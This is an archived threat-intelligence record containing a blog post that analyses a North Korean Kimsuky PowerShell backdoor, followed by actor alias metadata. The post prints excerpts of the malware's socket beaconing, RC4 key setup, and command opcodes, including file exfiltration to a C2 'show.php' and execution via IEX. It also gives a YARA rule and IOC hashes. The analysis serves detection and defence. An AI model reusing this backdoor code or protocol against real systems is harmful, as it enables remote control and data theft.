{ "id": "46ed74e2-3c84-47d2-bd30-a8dc6f58e8d7", "created_at": "2026-04-06T00:12:46.872347Z", "updated_at": "2026-04-10T03:37:40.61439Z", "deleted_at": null, "sha1_hash": "21ca33d4c54765a98ec61387615fe1f18c72c3b4", "title": "Kimsuky 2", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 495370, "plain_text": "Kimsuky 2\r\nPublished: 2024-03-09 · Archived: 2026-04-05 14:16:48 UTC\r\nIntroduction\r\nImage Credits\r\nIn my previous blog post, I covered the analysis of a North Korean-based APT group called Kimsucky APT. We examined a\r\nmalicious document that utilized a PowerShell script for the adversary’s purposes. Let’s revise some key points about\r\nKimsucky :\r\nTargets: Primarily targets organizations in South Korea, Japan, and the United States\r\nTechniques: Often uses malicious documents containing exploits or links to download malware that can steal data or\r\nprovide remote access.\r\nTactics: Employs social engineering techniques (like spear phishing) and watering hole attacks to gain initial access\r\nto victim systems.\r\nI found this particular sample of the Kimsucky in wild while doing my daily after wake-up bazaar browsing. Interestingly\r\nthe sample is very simple and will help people understand how Powershell works. Unfortunately the sample I found didn’t\r\nhad any connections or the C2’s IP was missing from the script.\r\nPowershell Analysis\r\nServer Connection\r\nEven though the script itself is not at obfuscated or difficult to understand at all but the length of script is very long so we\r\nwill try and analyse it part by part. We will start at the bottom of the script first to understand the control flow.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n// Has 800 line of code above it\r\nwhile( $true ) {\r\n $fContinue = CommunicationWithServer -StrIp \"127.0.0.1\" -UPort 8888;\r\n if( $fContinue -eq $false ) {\r\n Write-Host \"Server requests to close client.\";\r\n break;\r\n }\r\n Start-Sleep -Seconds 1;\r\n }\r\nRemoteFileManager\r\nhttps://somedieyoungzz.github.io/posts/kimsucky-2/\r\nPage 1 of 7\n\nThis code keeps on trying to connect to the remote server every second unless the server requests to disconnect otherwise it\r\nkeeps connecting indefinitely. Here we see references to two functions namely CommunicationWithServer and\r\nRemoteFileManager. Let’s look at each one of them.\r\nCommunicationWithServer\r\nThis function is really big so we will divide it into small parts.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n Function CommunicationWithServer\r\n {\r\n [CmdletBinding()]\r\n Param (\r\n [Parameter(Position = 0, Mandatory = $True)]\r\n [String] $StrIp,\r\n [Parameter(Position = 1, Mandatory = $True)]\r\n [uint16] $UPort\r\n )\r\n $Ip = [System.Net.Dns]::GetHostAddresses($strIp);\r\n $Address = [System.Net.IPAddress]::Parse($Ip);\r\n while($True)\r\n {\r\n try {\r\n $Socket = New-Object System.Net.Sockets.TcpClient($Address, $UPort);\r\n if($Socket.Connected) {\r\n break;\r\n }\r\n }\r\n catch {}\r\n Start-Sleep -Milliseconds 10000;\r\n }\r\nThis part is doing the same thing as the one above it\r\nUnique ID\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n$SocketStream = $Socket.GetStream();\r\n \r\n #UniqueId Generate\r\n $HashObject = [Security.Cryptography.HashAlgorithm]::Create(\"MD5\");\r\n $EncObject = New-Object System.Text.UTF8Encoding;\r\n $Ipv4Address = GetIpv4Address;\r\n $MacAddress = GetMacAddress -Ipv4Address $Ipv4Address;\r\n $HashValue = $HashObject.ComputeHash($EncObject.GetBytes($MacAddress + $Ipv4Address));\r\n \r\n $StrTemp = [System.BitConverter]::ToString($HashValue);\r\n $StrUniqueId = RemoveHyphen -StrIn $StrTemp;\r\n $ByUniqueId = $EncObject.GetBytes($StrUniqueId);\r\n #RC4 Key Generate\r\n $SendKeyData = $EncObject.GetBytes($StrUniqueId + \"_r\");\r\n $RecvKeyData = $EncObject.GetBytes($StrUniqueId + \"_s\");\r\n $Global:SendKey = PrePare_Key -KeyData $SendKeyData;\r\n $Global:RecvKey = PrePare_Key -KeyData $RecvKeyData;\r\n #Send to Server OP_UNIQ_ID Message\r\n [uint16]$nOpCode = [_OP_CODE]::OP_UNIQ_ID;\r\n [uint32]$nUniqueIdLen = $ByUniqueId.Length;\r\n [uint32]$nDataLen = 4 + $nUniqueIdLen;\r\nhttps://somedieyoungzz.github.io/posts/kimsucky-2/\r\nPage 2 of 7\n\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n $FirstPacket = New-Object System.Byte[](2 + 4 + $nDataLen);\r\n [Array]::Copy([BitConverter]::GetBytes($nOpCode), 0, $FirstPacket, 0, 2);\r\n [Array]::Copy([BitConverter]::GetBytes($nDataLen), 0, $FirstPacket, 2, 4);\r\n [Array]::Copy([BitConverter]::GetBytes($nUniqueIdLen), 0, $FirstPacket, 6, 4);\r\n [Array]::Copy($ByUniqueId, 0, $FirstPacket, 10, $nUniqueIdLen);\r\n $SocketStream.Write($FirstPacket, 0, $FirstPacket.Length);\r\nA socket is being setup for transfer of data.\r\nA paramter called Unique ID is being generated which\r\nCreates a MD5 hash object\r\nThe IPv4 and MAC adsress is concatenated together and hashed.\r\nThis hash is converted into string and hyphens are removed from the string and stored in $StrUniqueId\r\nRC4 key generation is done by appending “_r” to the $StrUniqueId and “_s” for decryption.\r\nKeys are prepared and stored in a global variable respectively for encryption and decryption.\r\nA structure for messsage sending and receiving is being defined here and the message containing the unique\r\nID is sent to server using socket stream.\r\nPacket Recieving\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n#Recieve Packets from Server and Send to Server Result.\r\n $ReadBuffer = New-Object Byte[] 4196;\r\n $ContinueFlag = $True;\r\n $ping_send = New-Object Byte[] 1;\r\n $Tick = 0;\r\n While($ContinueFlag)\r\n {\r\n Start-Sleep -Milliseconds 1;\r\n if( ($Tick -eq 0) -or ($API::GetTickCount() - $Tick -gt 1000) ) {\r\n try {\r\n $send_result = $Socket.Client.Send($ping_send);\r\n if( $send_result -eq 0 ) {\r\n Write-Host \"Disconnected from Server[1]!!!\";\r\n $ContinueFlag = $false;\r\n }\r\n } catch [Exception] {\r\n Write-Host \"Disconnected from Server[0]!!!\";\r\n $ContinueFlag = $false;\r\n }\r\n $Tick = $API::GetTickCount();\r\n }\r\nAs the name suggests it continuously recieves data from the server and sends a ping every second to maintain the\r\nconnection. If there’s any issue in the ping then stops the connection.\r\nRemoteFileManager\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\nFunction RemoteFileManager\r\n{\r\n Add-Type -TypeDefinition @\"\r\n using System;\r\nusing System.Diagnostics;\r\nusing System.Runtime.InteropServices;\r\nusing System.Security.Principal;\r\nhttps://somedieyoungzz.github.io/posts/kimsucky-2/\r\nPage 3 of 7\n\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n [Flags]\r\n public enum _OP_CODE : ushort\r\n {\r\n OP_UNIQ_ID = 0x401,\r\n OP_REQ_DRIVE_LIST = 0x402,\r\n OP_RES_DRIVE_LIST = 0x403,\r\n OP_REQ_PATH_LIST = 0x404,\r\n OP_RES_PATH_LIST = 0x405,\r\n OP_REQ_PATH_DOWNLOAD = 0x406,\r\n OP_RES_PATH_DOWNLOAD = 0x407,\r\n OP_REQ_PATH_DELETE = 0x408,\r\n OP_RES_PATH_DELETE = 0x409,\r\n OP_REQ_FILE_UPLOAD = 0x40A,\r\n OP_RES_FILE_UPLOAD = 0x40B,\r\n OP_REQ_PATH_RENAME = 0x40C,\r\n OP_RES_PATH_RENAME = 0x40D,\r\n OP_REQ_CREATE_DIR = 0x40E,\r\n OP_RES_CREATE_DIR = 0x40F,\r\n OP_REQ_RESTART = 0x410,\r\n OP_REQ_CLOSE = 0x411,\r\n OP_REQ_REMOVE = 0x412,\r\n OP_RES_DRIVE_ERROR = 0x413,\r\n OP_REQ_EXECUTE = 0x414,\r\n OP_RES_EXECUTE = 0x415,\r\n OP_REQ_CREATE_ZIP = 0x416,\r\n OP_RES_CREATE_ZIP = 0x417\r\n }\r\n [StructLayout(LayoutKind.Sequential)]\r\n public struct _RC4_KEY\r\n {\r\n public Byte[] state;\r\n public Byte x;\r\n public Byte y;\r\n }\r\n\"@\r\n $signatures = @'\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern UInt32 GetTickCount();\r\n'@\r\n $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru\r\n $Global:SendKey = New-Object _RC4_KEY;\r\n $Global:RecvKey = New-Object _RC4_KEY;\r\n $Global:indexX = 0;\r\n $Global:indexY = 0;\r\nThis RemoteFileManager function starts with Add-Type command that lets you define dynamically new types in\r\nPowershell. It can be used to create .Net classes and enum types. In our code two elements are composed of\r\n_OP_CODE - Here, each constant represents an operation code used in the communication protocol between the\r\nclient and the server. Explanation of these enums are given below\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\nOP_UNIQ_ID = 0x401, # Check-In Unique ID - Sent with first packet from Client\r\nOP_REQ_DRIVE_LIST = 0x402, # Request from Server for logical drive info\r\nOP_RES_DRIVE_LIST = 0x403, # Response from client with logical drive info\r\nOP_REQ_PATH_LIST = 0x404, # Request from Server for list of dir \u0026 files from path\r\nOP_RES_PATH_LIST = 0x405, # Response from client with list of dir, files from path\r\nOP_REQ_PATH_DOWNLOAD = 0x406, # Request from server to exfiltrate file/dir to the C2 - arg: file/dir_path;c2_url\r\nOP_RES_PATH_DOWNLOAD = 0x407, # Response from client once the file/dir (ZIP + b64 encoded) is exfiltrated to C2\r\nOP_REQ_PATH_DELETE = 0x408, # Request from server to delete dir/file - arg:path\r\nOP_RES_PATH_DELETE = 0x409, # Response from client after deleting dir/file\r\nOP_REQ_FILE_UPLOAD = 0x40A, # Request from server to upload file on the machine\r\nhttps://somedieyoungzz.github.io/posts/kimsucky-2/\r\nPage 4 of 7\n\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\nOP_RES_FILE_UPLOAD = 0x40B, # Response from client once the uploaded file is written on the machine\r\nOP_REQ_PATH_RENAME = 0x40C, # Request from server to rename file/folder - arg:oldfilename,newfilename\r\nOP_RES_PATH_RENAME = 0x40D, # Response from client after renaming file/folder\r\nOP_REQ_CREATE_DIR = 0x40E, # Request from server to create directory - arg: path - add (2) if already created\r\nOP_RES_CREATE_DIR = 0x40F, # Response from server after creating directory\r\nOP_REQ_RESTART = 0x410, # Restart connection\r\nOP_REQ_CLOSE = 0x411, # Close connection\r\nOP_REQ_REMOVE = 0x412, # Close connection\r\nOP_RES_DRIVE_ERROR = 0x413, # Sent from client: no drives found / no permissions / io error\r\nOP_REQ_EXECUTE = 0x414, # Request from Server to execute file/command - arg:path\r\nOP_RES_EXECUTE = 0x415, # Response from client after executing the file/command via IEX - uses OP_REQ_EXECUTE\r\nOP_REQ_CREATE_ZIP = 0x416, # Request from server to ZIP archive files/directory arg: path\r\nOP_RES_CREATE_ZIP = 0x417 # Response from server after ZIP archiving the files/directory - uses OP_REQ_CREATE_ZI\r\n1\r\n2\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern UInt32 GetTickCount();\r\nJust use GetTickCount from kernel32.dll\r\nRequest parameters to C2:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\nPOST Request Body:\r\n - filename = ToBase64String(filename) | filename: file to be exfiltrated\r\n - Data: ToBase64String(file_contents) ; File contents of file to be exfiltrated\r\n \r\nC2 URL: C2_URL/show.php | C2_URL provided from the Server\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.\r\nWe’ve almost covered all the main functions of the the backdoor script and some functions are left for your interpretation.\r\nThis particular sample uses a technique called Compile After Delivery. You can read more at T1027.004 . It uses csc.exe to\r\ncompile the .Net code. This script is basically a backdoor used by the Kimsucky APT. I couldn’t find the server side code or\r\nthe server anywhere. A twitter user did post the server you can see below. If anyone finds the server please let me know.\r\nhttps://somedieyoungzz.github.io/posts/kimsucky-2/\r\nPage 5 of 7\n\nYARA Rules\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\nrule Kimsucky_Backdoor{\r\n meta:\r\n description = \"Detects Kimsucky PowerShell backdoor script\"\r\n author = \"somedieyoungZZ\"\r\n strings:\r\n $sleep_function1 = \"Start-Sleep\" # Common sleep function\r\n $sleep_function2 = \"System.Threading.Thread.Sleep\" # Alternative sleep method\r\n $socket_creation1 = \"New-Object System.Net.Sockets.TcpClient\" # TCP socket creation\r\n $socket_creation2 = \"New-Object System.Net.Sockets.UdpClient\" # UDP socket creation\r\n $type_definition = \"Add-Type -TypeDefinition\" # Type definition marker\r\n $dll_import = \"[DllImport(\" # DllImport attribute start\r\n $remote_file_manager = \"RemoteFileManager\" # Target string\r\nhttps://somedieyoungzz.github.io/posts/kimsucky-2/\r\nPage 6 of 7\n\n13\r\n14\r\n15\r\n16\r\n condition:\r\n any of ($sleep_function*) and any of ($socket_creation*) and all of ($type_definition, $dll_import) and ($remote_file_ma\r\n}\r\nIndicators Of Compromise (IOC)\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\nMD5\r\nc81ed44799aefb540123159618f7507c\r\nSHA-1\r\nfd23177a4481f39fe53a306e2d7fe282cb30a87d\r\nSHA-256\r\n87b5a1f79a2be17401d8b2d354c61619ce6195b57e8a5183f78b98e233036062\r\nVirustotal\r\nANY.RUN\r\nBazaar\r\nThank You for reading this till the end ❤\r\nDiscord somedieyoungzz\r\nTwitter https://twitter.com/IdaNotPro\r\nSource: https://somedieyoungzz.github.io/posts/kimsucky-2/\r\nhttps://somedieyoungzz.github.io/posts/kimsucky-2/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://somedieyoungzz.github.io/posts/kimsucky-2/" ], "report_names": [ "kimsucky-2" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434366, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/21ca33d4c54765a98ec61387615fe1f18c72c3b4.pdf", "text": "https://archive.orkl.eu/21ca33d4c54765a98ec61387615fe1f18c72c3b4.txt", "img": "https://archive.orkl.eu/21ca33d4c54765a98ec61387615fe1f18c72c3b4.jpg" } }